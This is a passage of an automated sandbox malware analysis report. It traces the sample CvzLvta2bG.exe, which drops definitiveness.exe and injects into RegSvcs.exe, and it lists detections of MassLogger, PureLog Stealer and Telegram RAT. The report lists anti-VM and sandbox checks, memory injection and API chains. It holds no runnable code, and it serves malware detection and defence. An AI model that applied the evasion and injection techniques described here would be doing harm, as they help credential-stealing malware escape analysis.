Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6900, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	API/Special instruction interceptor: Address: 1342B54
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	API/Special instruction interceptor: Address: 149250C

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: definitiveness.exe, 00000002.00000002.2373888675.000000000125B000.00000004.00000020.00020000.00000000.sdmp, definitiveness.exe, 00000002.00000003.2354564739.000000000125B000.00000004.00000020.00020000.00000000.sdmp, definitiveness.exe, 00000002.00000003.2354411900.000000000125B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXEC)
Source: CvzLvta2bG.exe, 00000000.00000003.2345532654.0000000001412000.00000004.00000020.00020000.00000000.sdmp, CvzLvta2bG.exe, 00000000.00000002.2354923227.000000000146E000.00000004.00000020.00020000.00000000.sdmp, CvzLvta2bG.exe, 00000000.00000003.2345629170.000000000146E000.00000004.00000020.00020000.00000000.sdmp, definitiveness.exe, 00000002.00000002.2373888675.000000000125B000.00000004.00000020.00020000.00000000.sdmp, definitiveness.exe, 00000002.00000003.2354564739.000000000125B000.00000004.00000020.00020000.00000000.sdmp, definitiveness.exe, 00000002.00000003.2354411900.000000000125B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: definitiveness.exe, 00000006.00000003.2472783738.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, definitiveness.exe, 00000006.00000003.2472518140.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, definitiveness.exe, 00000006.00000002.2489588029.00000000013A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE<L
Source: definitiveness.exe, 00000006.00000003.2472783738.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, definitiveness.exe, 00000006.00000003.2472518140.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, definitiveness.exe, 00000006.00000002.2489588029.00000000013A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE(

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

3_2_004019F0

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-105826

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	API coverage: 4.4 %
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	API coverage: 4.6 %

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00E6445A
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6C6D1 FindFirstFileW,FindClose,	0_2_00E6C6D1
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00E6C75C
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00E6EF95
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00E6F0F2
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00E6F3F3
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00E637EF
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00E63B12
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00E6BCBC
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066445A GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0066445A
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066C6D1 FindFirstFileW,FindClose,	2_2_0066C6D1
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0066C75C
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0066EF95
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0066F0F2
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0066F3F3
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_006637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_006637EF
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00663B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00663B12
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0066BCBC

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00E049A0

Source: wscript.exe, 00000005.00000002.2472322840.000001CDF3682000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: RegSvcs.exe, 00000007.00000002.3597935036.00000000015D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
Source: RegSvcs.exe, 00000003.00000002.3597848215.0000000001017000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	API call chain: ExitProcess graph end node			graph_0-104842
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E73F09 BlockInput,

0_2_00E73F09

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00E03B3A

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E35A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00E35A7C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

3_2_004019F0

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E04B37 LoadLibraryA,GetProcAddress,

0_2_00E04B37

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_01580340 mov eax, dword ptr fs:[00000030h]	0_2_01580340
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_015803A0 mov eax, dword ptr fs:[00000030h]	0_2_015803A0
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_0157ED30 mov eax, dword ptr fs:[00000030h]	0_2_0157ED30
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_013417B0 mov eax, dword ptr fs:[00000030h]	2_2_013417B0
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_01342DC0 mov eax, dword ptr fs:[00000030h]	2_2_01342DC0
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_01342E20 mov eax, dword ptr fs:[00000030h]	2_2_01342E20
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 6_2_01491168 mov eax, dword ptr fs:[00000030h]	6_2_01491168
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 6_2_01492778 mov eax, dword ptr fs:[00000030h]	6_2_01492778
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 6_2_014927D8 mov eax, dword ptr fs:[00000030h]	6_2_014927D8

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00E580A9

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E2A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00E2A155
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E2A124 SetUnhandledExceptionFilter,	0_2_00E2A124
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0062A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0062A155
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0062A124 SetUnhandledExceptionFilter,	2_2_0062A124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004123F1 SetUnhandledExceptionFilter,	3_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C50008			Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 118A008			Jump to behavior

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E587B1 LogonUserW,

0_2_00E587B1

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00E03B3A

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00E048D7

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E64C7F mouse_event,

0_2_00E64C7F

Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\CvzLvta2bG.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe "C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E57CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00E57CAF

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E5874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00E5874B

Source: CvzLvta2bG.exe, definitiveness.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CvzLvta2bG.exe, definitiveness.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E2862B cpuid

0_2_00E2862B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

3_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E34E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00E34E87

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E41E06 GetUserNameW,

0_2_00E41E06

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E33F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00E33F3A

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00E049A0

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6900, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6900, type: MEMORYSTR

